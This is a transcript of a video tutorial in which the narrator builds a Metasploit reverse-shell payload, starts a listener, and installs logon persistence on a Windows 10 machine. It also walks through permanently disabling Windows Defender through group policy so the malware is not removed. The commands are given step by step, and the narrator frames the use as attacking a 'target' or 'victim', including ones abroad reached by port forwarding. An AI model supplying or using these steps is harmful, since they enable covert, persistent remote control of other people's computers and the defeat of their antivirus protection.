To a new video tutorial. Today we're going to be discussing Metasploit and using persistence in Metasploit so that when your target even shuts down their computer, loses internet connection or restarts, that same shell will then connect back to you without you having to reinfect the machine. Now I'm doing this video because it was requested quite a lot. It's pretty easy to do, and if you are wanting to play around with Metasploit and use commands like this, then this tutorial is really going to help you out a lot. So what I've got here is Kali Linux 2016.1, and I also have Windows 10 64-bit, and the only modification I've made to this machine is I have disabled Windows Defender completely, just for testing purposes, because obviously Windows Defender will remove this virus simply because of how public knowledge it is, and every virus signature database has all the payloads from Metasploit in their database. So I will show you how to permanently disable Windows Defender, because if you're like me, you'll run into the same problem I had, where I would restart the machine and Windows Defender would switch itself back on and then kill the virus. So I'm on the Windows 10 machine here, and all you need to do is press the Windows key and R to open up Run and type in gpedit.msc, and that is the group policy editor. The group policy, by the way, edits policies for various groups on the network. It is commonly used. Why can't I speak? This accent prevents me from speaking like a human being. But this group policy editor is used primarily really for Windows networks using the Active Directory, so you can configure policies for people, whether they can use Task Manager and things like that on a server-wide, on a network-wide basis. But we're just going to use it today to disable Windows Defender completely. So I'll actually show you. If I go to settings here, and if I go to update and security and click on Windows Defender, you can see it's all grayed out and I can't change anything here, and it's permanently switched off. It says it's on, but it's off. So what you want to do is click on Administrative Templates and then expand that tree and go to Windows Components and expand that tree, and then go to Windows Defender and expand that tree. And then in the main kind of section here, you'll see turn off Windows Defender, and mine is set to enabled. Just double click on the policy and it should be defaulted to not configured. Click enabled, click apply and OK, and then give your machine a little restart, and then you'll be good to go. Windows Defender will be completely disabled, which will allow you to go ahead and run malware on it without being removed, which is rather annoying. So welcome back to Kali Linux here, and what we need to do is do what we've done lots and lots of times before, but I'll carry on doing it because I assume that not many people will have watched, well, not everyone will have watched my previous videos, so I'm going to be doing this from start to finish. But what we need to do is create our payload. So you want to open up a terminal, you want to type in msfvenom -p windows /memterpreter /reverse _TCP, and then you want to set the lhost to your IP address of this machine, not the target machine but this machine. So if you open up another terminal and just type in ifconfig, you will get your machine. And by the way, as I mention every single video, and I'll mention it again, this is done on a local network, so I don't need to port forward, and firewalls aren't really affected because, in my testing, they're not affected at all, simply because it's a reverse TCP. That's how they work. However, if you are doing this attack on a WAN network, you are connecting to your friend, well, I say friend, you're connecting to your target who's in a different country, you will need to port forward, and you'll need to port forward port 4444 if you choose to use that port. Anyway, so you want to do the lhost equal to 192.168.153.173, or whatever your IP address is. I get this from this section here, which is your inet address. You can see that, and I just got that by typing ifconfig. And then you want to type in lport, and that will equal 4444. You can choose any port number you want. Well, don't choose port 80 or something like that, but choose something, like 4444, just something completely random, and that is the port you will need to port forward if you choose to do this on a WAN network. And then you want to do -f for file or file type, and just do exe, and then just put a little right arrow here, and then do shell.exe or whatever you want to call it, payload.exe, as long as you put a .exe at the end. Hit enter, and that's going to generate our payload for us. So just give it a second, and there you go. You can see the payload size is 333 bytes. So then what we need to do is get this shell onto our local, our target machine. But we don't need to do that yet. But you can see if I type in ls, you can see that shell.exe is there. And that will be what we will drag onto the Windows 10 machine. Now type in MSF console, which is our console for viewing sessions and such like that. This is where we do the majority of our Metasploit framework work. And that will load up. And then what you want to do is type in use exploit /interpreter /reverse. Oh no, that's not right, sorry. Exploit /multi/handler. You want to set the payload to be Windows interpreter reverse _ TCP, and you want to set your lhost equal to 192.168.153 or whatever you set yours to be when you created the payload. You also want to set your L port to 4444 or whatever you chose, and then you want to type in exploit-j-z, which will basically put it in the background, and you can see that it failed to bind. I'm assuming that's because I've already got it running, which is interesting. So what I'll do is I'll restart this machine, and we'll see what happens, unless there's a command I can type. So there we go, I've just given it a little restart there, and now we are good to go. So what we need to do now is transfer our shell over to our machine, or rather our victim. So what I'm going to do for this is, you can get this on however you want to. For me, I'm just going to drag it to my host, switch machines to Windows 10, which is black screening, and then drag the shell back over to this machine, which should recognise I'm dragging a file in a minute. I apologise if you just heard that motorbike going past, which is weird because I live in the middle of nowhere. The Windows 10 machine's being slow. There we go. Let's go. Come on. Come on. There we go. I don't know why it gets really slow when I'm recording. It must know. So now that the Windows 10 machine's now working, I don't know what's going on today. I mean, like, I always test stuff before I do the video, but then stuff just breaks. So anyway, I've opened the shell on the Windows 10 machine. You can see that we have a stage. We now have an open session that I can interact with. So if I do sessions-I, you can see we've got session ID 1, and I can interact with that shell. The reason we know is if I type in shell, and then type let's see, I can't remember the commands here. I don't know. I don't really know what to do to prove that this is the machine. It's this info. You can see that it's Windows 10, yada yada yada, and then hopefully you get the idea. So what we need to do is we need to interact. I don't know why I just quit. You need to interact with that shell, which has gone rogue. I accidentally closed the shell. It's late. I shouldn't be recording this late. Anyway. So there we go, yada yada yada. And then interact with that shell we've just opened, so that will be shell 2. And then what we need to do is we need to actually get persistence. Now persistence is really easy to do. If you type in run persistence-h, you will get a help menu. Well, you will do if it would stop running so slowly. And basically you'll have a bunch of options here, so you know. You can automatically start a matching exploit/multi-handler to connect to the agent. You can set a location of target host to write as payload to. If none, temp will be used. You can set a payload to use, which is the default is reverse TCP. You can automatically start the agent on boot as a service with system privileges. And then with the one we're going to be using, obviously there's absolutely loads you can use, but the one we're going to be using is -u, which is automatically start the agent when the user logs on. So to actually do that, what you need to do is do run persistence-u with an interval of 5 seconds. I don't know why I put -i5. So that's 5 seconds on port number 4444 and IP number, which is -r of 192.168.153.173, which is obviously the IP address we are using, and hit enter, and that's going to create our script for us. You can see that it says install into auto run as yada yada yada, current version yada yada yada, and it just creates some random file. and it also creates a persistent script in the local data temp folder, so we can actually go ahead and browse that folder. If we just do %temp, see if we get anything, and where did it say it was? Update to local temp, and then it's a VBS script. So let's have a look. You can see we've got a VBS script here. I really need to start recording stuff. Why did it open it in Paint? I need to start recording stuff on a hard drive because stuff just goes bad. Or maybe this hard drive is dying. That would be interesting if it's dying on a capture. Please respond. But anyway, inside that file you can see we've got a function, and then it's encrypted from there, so you can't actually see anything. But I'm not going to show you anything else on this Windows 10 machine just because it's actually dying. So all we're going to do is we have a session here. You can see sysinfo, and normally now what would happen is if I shut down this Windows 10 machine, I would lose that connection and I'd have to run shell again. So all I'm going to do is delete this. I'm also going to empty the recycling bin, so you know that that file's gone. And then I'm going to go ahead and shut down the machine, or rather restart it. And you can, wow, look at this, man. Something is broken. Something is broken, and I cannot be asked to figure out what it is. So all I'm going to do is restart the machine here. So restart guest, and hopefully that will respond at some point. But anyway, you'll see that the session 2 has died because we've lost connection. And then I'm just going to leave it a couple of minutes for it to reboot, and you will see that we'll get a connection back. So the Windows 10 machine is now back online. So if we just type in exploit-j-z, we should get a connection. So you can see sending stage. I haven't ran anything, and we'll do sessions-interact with 4 sysinfo, and you can see we have a Windows 10 machine. So there you go. We've run persistence on this machine. Now there's obviously if you type in run persistence again, run persistence -h, you'll see that there is a couple of more options you can play with. So you've got -u, which we've done today. You've got -x, which will automatically start the agent when the system boots. I'm guessing that will give you access to more files, but you might need user privileges for that. You might need admin privileges, which is the same for the S one. Obviously, if you've got system privileges, and it's a service, I'm pretty sure you will have admin access over the entire machine. But we might cover that later, maybe in a video, maybe in a forum thread. But that is basically the end of this video. It's quite a quick one, but hopefully you guys now know how to use persistence when it comes to using Metasploit. But yeah, thank you for watching. Please like and comment and share the video if you enjoyed it. If you have any questions, feel free to post them in the forums and I will answer them, or post them on Ask Me. I'll answer them there as well, which I do every Saturday. And the link to that's in the description below. Also, don't forget to follow me on Twitter, that is @Jack1337. Don't forget to follow me on Twitch, that is @Jack1337. And also like me on Facebook, that is Jack Tutorials. And I shall see you again in the next one.